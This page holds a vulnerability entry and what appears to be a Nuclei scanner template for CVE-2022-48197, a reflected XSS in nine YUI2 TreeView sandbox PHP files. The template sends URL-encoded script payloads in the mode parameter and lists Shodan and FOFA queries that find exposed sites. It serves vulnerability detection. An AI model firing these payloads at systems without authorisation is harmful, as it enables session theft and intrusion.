漏洞描述
Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.
CVE-2022-48197: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting
PoC代码[已公开]
id: CVE-2022-48197
info:
name: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Cross-Site Scripting
author: ctflearner
severity: medium
description: |
Reflected cross-site scripting (XSS) exists in the TreeView of YUI2 through 2800: up.php sam.php renderhidden.php removechildren.php removeall.php readd.php overflow.php newnode2.php newnode.php.
impact: |
Attackers can inject malicious JavaScript through crafted mode parameters in multiple TreeView PHP files, potentially stealing user session tokens and performing actions on behalf of victims when they access the compromised pages.
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/51198
- https://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-48197
- http://packetstormsecurity.com/files/171633/Yahoo-User-Interface-TreeView-2.8.2-Cross-Site-Scripting.html
- https://github.com/ryan412/CVE-2022-48197/blob/main/README.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-48197
cwe-id: CWE-79
epss-score: 0.12108
epss-percentile: 0.93605
cpe: cpe:2.3:a:yui_project:yui:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 9
vendor: yui_project
product: yui
shodan-query:
- html:"bower_components/yui2/"
- http.html:"bower_components/yui2/"
fofa-query: body="bower_components/yui2/"
tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project,vuln
http:
- method: GET
path:
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
- "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "1'\"()&%<zzz><script>alert(document.domain)</script>"
- "widget.TreeView"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100bc174cfbdf1d68f3145d84762258be1ff21542e33a3e45dd5f04403b63ab0ecd022100ecf82b6cfc12b4a06bfb9de72a8f2b3cdceb1039d8c094468bd3431f60717e2e:922c64590222798bb761d5b6d8e72950